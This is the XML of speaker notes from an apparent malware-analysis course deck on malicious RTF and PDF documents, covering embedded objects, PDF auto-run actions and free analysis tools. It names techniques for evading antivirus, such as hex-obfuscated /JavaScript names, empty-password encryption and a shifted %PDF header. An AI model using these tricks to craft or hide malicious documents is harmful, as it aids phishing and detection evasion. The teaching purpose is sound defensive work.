              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> you have an example of malware that uses msg files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-U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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8646280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a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is another document format designed by Microsoft and called RTF (Rich Text Format). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed to be interchangeable between different applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The RTF format does not support the inclusion of macros, but it does allow other files to be embedded as objects using the OLE1 version (Object Linking and Embedding 1). As these objects can be any type of file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, VBScript), it is a potential threat in case of be activated on the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When Microsoft Word opens an RTF file, it extracts the embeds to the user's %TEMP folder. Attackers sometimes embed a malicious object within an RTF document and this malicious document within a Microsoft Word document, in a multiphase attack scheme.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In addition, the attacker can design malicious RTFs that attempt to directly exploit a vulnerability that allows shellcode execution within the application itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>An other example.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13689022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When scanning a suspected malicious RTF document, the scanner looks for embedded objects within the document. These objects are identified by the control word \object. The data that constitutes the content of the object is included within the group that includes the control word \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>objdata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The free tool rtfobj.py developed by Philippe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lagadec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows you to extract embedded objects from RTF documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The rtfdump.py tool developed by Didier Stevens lists the groups and structures of an RTF-formatted document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The pyxswf.py tool allows you to detect, extract, and parse Flash objects (SWF format). Once the Flash object is extracted, free tools such as Microsoft Windows JPEXS Free Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Adobe SWF Investigator, etc. are of interest.</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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31728297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The PDF file format (Portable document format) is usually used to publish final versions of documents for distribution on the Internet, email, or as documentation on physical supports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally it was a proprietary format from Adobe, this company released it as an open standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most widely used tool to view PDF documents is Adobe Acrobat Reader, although there are other widely used tools such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>maxoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Preview, Foxit Reader, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PDF format supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and flash embedded ActionScript scripts. It also allows interaction with remote websites and programs present on the device. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ùdiendo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will even contain other files.</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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30310796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The structure of a pdf consists of: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A header containing information about the version of the PDF specifications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the header one or more objects that specify the way to render the document. These objects can include text, fonts, graphics, and dynamic components (for example JavaScript).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the objects, the pdf file includes the cross reference table (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) which specifies the offsets where the objects in the file are located. This allows you to easily modify the document without the need to rewrite the entire file, being able to add objects by modifying the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the end of the document there is a Trailer. In which vital information is located, such as the offset of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table. number of objects, their size, which object is the first in the logical layout of the document (root) and optionally metadata of the file (Author, creation date, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The specification of the PDF document uses the term indirect object, to refer to objects that have a unique identifier and can therefore be referenced by other objects. The first number is known as the object number, and the second as the generation number. The object definition begins with the keyword obj and ends with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>endobj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Objects between the limit characters &lt;&lt; and &gt;&gt; and beginning with the limit character / are known as dictionary entries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PDF objects use streams to store data as sequences of bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious pdfs can be created that hide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> within streams.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The bytes representing the stream are limited by the stream and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>endstream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> keywords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Streams are frequently stored in encrypted format, and can be decoded by applying one or more filters.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3792206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An attack vector frequently used by malicious agents is the distribution of the malicious payload embedded in an office application document that enjoys a high market share (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Microsoft Word, Microsoft Excel, Microsoft PowerPoint, RTF, Adobe PDF). . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This malicious document is sent as an attachment to an email as part of a phishing campaign.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to proceed with the analysis of these malicious documents, the analyst must first know the structure of these documents. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows you to understand how an attacker can embed code or malware in them, as well as understanding common packaging and obfuscation techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I'm going to do a little introduction to the following types of documents / scripts, focusing on pdf documents</a:t>
            </a:r>
          </a:p>
          <a:p>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15433277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It is therefore a very complex format with a set of characteristics that can be exploited by a malicious agent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Adobe Reader has an engine similar to that used in web browsers. It is common to exploit vulnerabilities using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> embedded in pdf documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command execution. A pdf file can launch any operating system command, as long as the user confirms the message that appears in a pop-up window. Only Microsoft Windows versions allow the passing of parameters to the command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Embedded files. Attackers can take advantage of this feature to hide malicious executables from detection by antivirus and automated scanning engines Adobe does not allow files with EXE, BAT, CMD extensions to be embedded in pdf documents. Other file formats such as HTML or code python they can be embedded in PDF documents and launched from the viewer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>GoToE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> actions. A PDF file can contain embedded another PDF file and by means of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>GoToE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> action it can be opened automatically without notifying the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embedded Flash applications. A PDF file can contain Flash applications embedded as SWF files. Adobe's Flash engine is independent of the one installed on the system. Flash vulnerabilities are known to all.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>encryption. A PDF file can be encrypted with a password. The PDF structure continues to be the usual one, encrypting only some objects of the document. If the password is a null string Adobe Acrobat will automatically open the document without prompting the user. This can be exploited to hide malicious content from solutions that do not allow content decryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parsing flexibility. PDF viewers are quite flexible in interpreting the structure of a PDF. Example the magic number %PDF only has to be in the first 1024 bytes of the file header. This allows, for example, to insert another magic number and thus deceive antivirus tools.</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32667425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/Root indicates the first object that the PDF application will process after loading the file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenAction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and /AA specify the script or action to be executed automatically when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pPDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is opened:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/JavaScript or /JS. They specify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code to execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> changes the view to a specific destination within the same document or another PDF document:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Launch and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EmbeddedFiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. specify the action of an object. They could run a program, for example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, open specific documents, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/URI. Access a resource using a URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>submitForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoToR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can submit information to a URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RichMedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It could be used to embed Flash objects inside a PDF document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ObjStm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Allows you to obfuscate objects within a stream object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/JBIG2Decode indicates the presence of JBIG2 compression.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Page. Provides an estimate of the number of pages a document has.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Encrypt. Indicates that the PDF document contains DRM content or requires a password to be read.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/XFA. Indicates that it is a document with XML Form architecture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is the possibility of making it more difficult to detect malicious content by obfuscating these dictionary entries using hexadecimal codes. Example replace /JavaScript with /J#61vaScript.</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="652131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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PDFiD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool written in python by Didier Stevens and accessible on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>REMnux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> via the command PDFid.py allows you to scan PDF documents for the presence of dangerous tags and dictionary entries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Peepdf.py developed by José Miguel Esparza allows scanning PDF documents to determine if they contain malicious content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The pdf-parser.py tool, also by Didier Stevens, allows you to parse a PDF document and identify its fundamental elements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The QPDF tool allows you to make structural modifications to PDF files without affecting their content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Origame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a Ruby framework designed for parsing, parsing, and forging PDF documents. It can also be used to create custom documents or to inject malicious code into existing documents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A tool included in Origami is PDF Walker, which allows you to extract all objects from a pdf document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PDF stream Dumper, developed by David Zimmer in another very good tool for Microsoft Windows environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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24</a:t>
            </a:fld>
